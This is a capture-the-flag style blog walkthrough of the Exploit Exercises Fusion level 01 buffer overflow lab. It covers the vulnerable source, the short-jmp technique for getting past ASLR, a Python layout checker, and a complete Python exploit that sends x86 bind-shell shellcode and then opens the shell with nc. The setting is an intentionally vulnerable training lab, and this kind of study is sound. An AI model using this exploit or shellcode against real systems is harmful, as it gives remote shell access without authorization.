Exploit Exercise Binary Exploitation Fusion Level 01

Hello Friends,

Welcome again. Today I am sharing another walkthrough, this time of Exploit Exercises Fusion level 01. The level is a copy of the previous one with one difference: ASLR (Address Space Layout Randomization) is now enabled, so the stack, and with it the buffer that holds our request, lands at a different address on every run. If you have not done so yet, check the Exploit Exercises Fusion level 00 walkthrough first.

So, let's start.

Hint

This is a simple introduction to get you warmed up. The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path 'resolved' buffer might be a bad idea due to character restrictions due to realpath(). Instead, there is plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"

int fix_path(char *path)
{
  char resolved[128];

  /* realpath() expects a PATH_MAX-sized output buffer and writes each path
     component into it before checking that the component exists, so a long
     first component overflows this 128-byte array and the saved return
     address of fix_path even though realpath() then returns NULL. */
  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);
  /* no return value on the success path (as in the original level source) */
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  /* leaks the stack address of buffer; with ASLR it changes on every run */
  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');                  /* the path ends at the first space ... */
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");   /* ... and must be followed by HTTP/1.1 */

  fix_path(path);                         /* the overflow happens in here */

  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID);
  fd = serve_forever(PORT);
  set_io(fd);                             /* stdin/stdout now point at the client socket */

  parse_http_request();
}

Here our problem is ASLR. After some time spent researching and testing in GDB, I found a way around it.

The exact problem is that the injected shellcode starts at a random stack address on every run, so we cannot hard-code its address the way we did in level 00. We still need to get EIP to the start of our shellcode.

The solution is the JMP instruction. If you have not met it yet, start Googling now. A short JMP is a two-byte instruction that moves EIP a fixed distance forward or backward from its current position. Because the distance is relative, it works no matter where the code was loaded, which is exactly what we need under ASLR.

For example, to move EIP 39 bytes forward from the start of the jmp instruction, the instruction is

Disassembly:
0:  eb 25                   jmp    0x27

Inject it like this (string literal):

"\xEB\x25"

The displacement byte is 0x25 = 37, not 39: the CPU adds it to EIP after EIP has already advanced past the two-byte instruction, so 2 + 37 = 39, and the disassembler shows the target as 0x27 because the jmp itself sits at offset 0. In the exploit below the jmp is placed right in front of the overwritten return address, so it hops over the four address bytes and the '/' that follows them and lands in the NOP sled in front of the shellcode.

One more piece makes this work, and I leave the details for you to confirm in GDB: the return address 0x80488b9 lies inside the binary itself, which ASLR does not move, and at the moment fix_path returns, the first thing on the stack is its path argument, a pointer to our request in buffer. Work out what the instruction at 0x80488b9 does with it.
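Before sending anything it is worth checking the layout offline. The following is an added example, not code from the post: it mirrors what the target does with the request (the GET/space/HTTP/1.1 checks in parse_http_request, and realpath() copying only the first '/'-delimited component into the 128-byte resolved buffer before its lstat() fails), encodes the short jmp, and reports where control ends up. It assumes, and these are assumptions to verify in gdb, that the process working directory is "/" so the copy starts with a single "/", that fix_path's saved return address sits at resolved+140 (what "/" plus 137 NOPs plus the two-byte jmp add up to), and that the gadget at 0x80488b9 hands control to the first byte of path, i.e. buffer+4. The shellcode is the shell-storm #882 bind shell quoted later in the post.

```python
"""Offline layout check for the Fusion level01 request (added example).

Models parse_http_request() and the part of glibc realpath() that matters:
the cwd, a '/' and the FIRST '/'-delimited component are copied into the
128-byte `resolved` buffer before lstat() fails. Assumed, to be confirmed in
gdb: cwd is "/", the saved return address of fix_path is at resolved+140, and
the gadget at 0x80488b9 starts executing at path[0] (buffer+4).
"""
import struct
from collections import namedtuple

READ_SIZE = 1024      # sizeof(buffer) in parse_http_request()
RET_OFFSET = 140      # assumed offset of the saved return address in `resolved`
GADGET = 0x80488b9    # return address used by the post's exploit (binary is not PIE)
NOP = 0x90

# shell-storm #882 as quoted in the post: Linux/x86 bind shell on TCP port 1337
SHELLCODE = (
    b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80"
    b"\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10"
    b"\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80"
    b"\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0"
    b"\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    b"\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
)

Check = namedtuple("Check", "request_len resolved_len ret_ok jmp_at lands_at shellcode_at")

def jmp_rel8(distance):
    """Short jmp landing `distance` bytes past its own first byte. The CPU adds
    the displacement to EIP after the 2-byte instruction, so 39 encodes as 0x25."""
    disp = distance - 2
    if not -128 <= disp <= 127:
        raise ValueError("distance %d is out of rel8 range" % distance)
    return b"\xeb" + struct.pack("<b", disp)

def jmp_rel8_target(code, at):
    """Offset inside `code` that the short jmp at code[at] lands on."""
    if code[at] != 0xEB:
        raise ValueError("no short jmp at offset %d" % at)
    return at + 2 + struct.unpack("<b", code[at + 1:at + 2])[0]

def build_request(shellcode=SHELLCODE, nops=137, sled=200, tail=400, ret=GADGET, distance=39):
    """Same layout as the post's exploit: sled, jmp, return address, '/',
    second sled, shellcode, trailing NOPs, then the protocol version."""
    path = (b"\x90" * nops + jmp_rel8(distance) + struct.pack("<I", ret)
            + b"/" + b"\x90" * sled + shellcode + b"\x90" * tail)
    return b"GET " + path + b" HTTP/1.1"

def parse_like_target(request):
    """Mirror parse_http_request(): the path as the C code sees it, or a
    ValueError carrying the errx() message the server would die with."""
    buf = request[:READ_SIZE]
    if buf[:4] != b"GET ":
        raise ValueError("Not a GET request")
    cstr = buf[4:].split(b"\x00", 1)[0]          # strchr() stops at the first NUL
    q = cstr.find(b" ")
    if q < 0:
        raise ValueError("No protocol version specified")
    if cstr[q + 1:q + 9] != b"HTTP/1.1":
        raise ValueError("Invalid protocol")
    return cstr[:q]

def realpath_copy(path, cwd=b"/"):
    """Bytes glibc realpath() has written to `resolved` when its first lstat()
    fails: the absolute prefix plus the first '/'-delimited component."""
    if path.startswith(b"/"):
        prefix = b"/"
    else:
        prefix = cwd if cwd.endswith(b"/") else cwd + b"/"
    return prefix + path.lstrip(b"/").split(b"/", 1)[0]

def check_layout(request, shellcode=SHELLCODE):
    """Walk the request the way the target would and report where control
    ends up, assuming execution starts at path[0] (see module docstring)."""
    if len(request) > READ_SIZE:
        raise ValueError("request is longer than the 1024-byte read()")
    path = parse_like_target(request)
    resolved = realpath_copy(path)
    if len(resolved) < RET_OFFSET + 4:
        raise ValueError("first path component does not reach the return address")
    ret_ok = struct.unpack("<I", resolved[RET_OFFSET:RET_OFFSET + 4])[0] == GADGET
    i = 0
    while path[i] == NOP:                        # slide down the first sled to the jmp
        i += 1
    target = jmp_rel8_target(path, i)
    if not 0 <= target < len(path):
        raise ValueError("jmp lands outside the request")
    j = target
    while path[j] == NOP:                        # slide down the second sled
        j += 1
    if path[j:j + len(shellcode)] != shellcode:
        raise ValueError("jmp at %d lands at %d, not in front of the shellcode" % (i, target))
    return Check(len(request), len(resolved), ret_ok, i, target, j)

if __name__ == "__main__":
    print(check_layout(build_request()))
    # Without the '/' realpath() copies the whole path and runs far past the
    # return address into fix_path's caller frame.
    no_slash = build_request().replace(b"/", b"\x90", 1)
    print("bytes realpath() copies without the '/':",
          len(realpath_copy(parse_like_target(no_slash))))
```

Running it prints the offsets for the post's layout (jmp at 137, landing at 176, shellcode at 344) and shows that without the '/' realpath() would keep copying through the sled and into the shellcode until its first 0x2f byte, well past the return address; that is what the '/' in the exploit prevents.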

Here, is my exploit

#!/usr/bin/env python3

# import modules
import socket
import struct
import os

# Target Configurations
TARGET_IP = input('[+] Enter Target IP [default 192.168.43.231] : ') or '192.168.43.231'
TARGET_PORT = 20001

# create socket and connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET_IP, TARGET_PORT))

# ===================================================================
#             Unsuccessful Payload Created From MSFVENOM
# ===================================================================
# cmd
#    msfvenom -p linux/x86/shell/bind_tcp -n 200 -f py -b '\x00\xff'
# (kept for the record; it is not sent, the shell-storm payload below is)
msf_buf =  b""
msf_buf += b'\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
msf_buf += b'\x31\xC9\x31\xD2\x31\xC0\x31\xDB\x31\xF6\x31\xFF'
msf_buf += b"\x93\x41\x2f\x43\x48\xfc\x41\x49\x9b\x9b\x93\xf9\x9b"
msf_buf += b"\x2f\xfc\x9b\xf9\x90\x3f\x92\x93\x4b\x40\x49\x49\x92"
msf_buf += b"\xf9\x37\x92\x42\x43\x41\x91\x4b\xfd\xfc\x41\x91\x4a"
msf_buf += b"\x90\x27\xf5\x27\x90\x49\x2f\xf9\x43\x48\x42\x90\x4b"
msf_buf += b"\x2f\x37\xfc\x99\xfc\xf8\x9b\x9f\x92\x37\x4b\x93\x48"
msf_buf += b"\x43\x9f\x98\xf8\xf5\x93\x40\xf5\x41\x27\x40\x93\x3f"
msf_buf += b"\x4a\x9b\x93\x37\x41\x9f\xf8\x49\xf9\x41\xf5\x49\x91"
msf_buf += b"\x41\x42\x2f\x99\x90\x99\xf5\x37\xf9\x93\x9b\x2f\xf8"
msf_buf += b"\xf8\x41\x93\xf5\x42\x93\x49\xfc\xf5\x40\x37\x4b\x90"
msf_buf += b"\x43\xd6\x9f\xd6\x48\xf8\x42\x90\x49\x49\x2f\x2f\x37"
msf_buf += b"\x43\x92\xf8\x40\x9b\xfc\x91\x9f\x40\x40\x9f\xf8\xf8"
msf_buf += b"\x9b\xfd\xf9\x92\x91\x98\x42\x43\xfc\x49\x90\x9b\x98"
msf_buf += b"\x42\x98\x9b\x3f\x27\x40\xf8\xfd\x99\xf5\xfc\x4a\x27"
msf_buf += b"\xf8\x27\xfd\x43\x37\x49\x92\x9b\x49\x9f\x43\xd6\x92"
msf_buf += b"\x27\xfd\x4b\xfd\xf8\x49\x9f\xfc\xf8\x4a\x48\x49\x4b"
msf_buf += b"\x4b\x49\x99\x40\x92\xbe\x99\x74\x93\xf3\xda\xcb\xd9"
msf_buf += b"\x74\x24\xf4\x5d\x31\xc9\xb1\x1c\x31\x75\x14\x83\xed"
msf_buf += b"\xfc\x03\x75\x10\x7b\x81\xf9\x8e\x23\xf3\x4c\x77\x6a"
msf_buf += b"\x03\xa1\x78\x8c\x8d\x22\x1e\x0d\x6e\xa4\x2f\xc0\xf1"
msf_buf += b"\x94\x14\x2d\x12\x85\xe9\x82\xbf\x28\x67\xc5\xf0\x4b"
msf_buf += b"\xba\x85\xa0\xf9\x40\xd1\x28\xfc\x22\xd8\xfc\x97\x3a"
msf_buf += b"\x3b\x96\x99\x67\xd1\x01\xfe\x5a\xa5\x59\x7d\xa0\xb1"
msf_buf += b"\x3c\xd9\x77\xeb\xd6\xdf\x87\x1a\x7b\x8a\x97\x4d\xd3"
msf_buf += b"\xc3\x79\x07\xb5\x8b\xb4\x57\xe8\xcf\xf7\x31\xc6\x90"
msf_buf += b"\xa8\xfe\x68\xf6\xc1\x51\x8d\x3a\x51\xc2\x3b\xc8\xe2"
msf_buf += b"\xe7\x8e\x51\x85\x38\x4b\xe2\x8c\x0b\xec\xfd\x70"

# ================================================================
#                 Another Payload (this is the one that is sent)
# ================================================================
# url :
#      http://shell-storm.org/shellcode/files/shellcode-882.php
# Linux/x86 bind shell on TCP port 1337 (0x0539). The '/' bytes in it are
# fine: they come after the '/' that ends the first path component, so
# realpath() never gets to them.
buf  = b''
buf += b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"

payload  = b'GET '
payload += b'\x90' * 137 + b'\xeb\x25'   # NOP sled, then short jmp 39 bytes forward (over the return address and the '/')

payload += struct.pack("<I", 0x80488b9)  # overwrites fix_path's saved return address; the binary is not randomized
payload += b'/'      # <--- ends the first path component, so realpath() stops copying right after the
                     #      return address and leaves the rest of the caller's frame (the path argument) intact
payload += b'\x90' * 200

# ShellCode here
payload += buf
payload += b'\x90' * 400

payload += b' HTTP/1.1'  # the first space ends the path; strncmp() wants HTTP/1.1 right after it

assert len(payload) <= 1024  # parse_http_request() read()s at most sizeof(buffer) bytes

s.sendall(payload)

s.settimeout(3)
print("[+] Wait For Response")
try:
    reply = s.recv(len('trying to access %s\n') + 10)
    print([reply])
    print("[-] If You Are Reading This Message Then Probably Exploit failed.")
    input("[-] Exit. Trying Again..")
    s.close()
except socket.timeout:
    # no reply at all: printf() was never reached, so the shellcode is (probably) listening
    print("[+] Starting Bind TCP Shell.")
    print("[+] Use Commands Carefully.")
    os.system('nc {} 1337'.format(TARGET_IP))



Check Exploit Exercise Fusion level 00


Don't forget to leave a comment below.
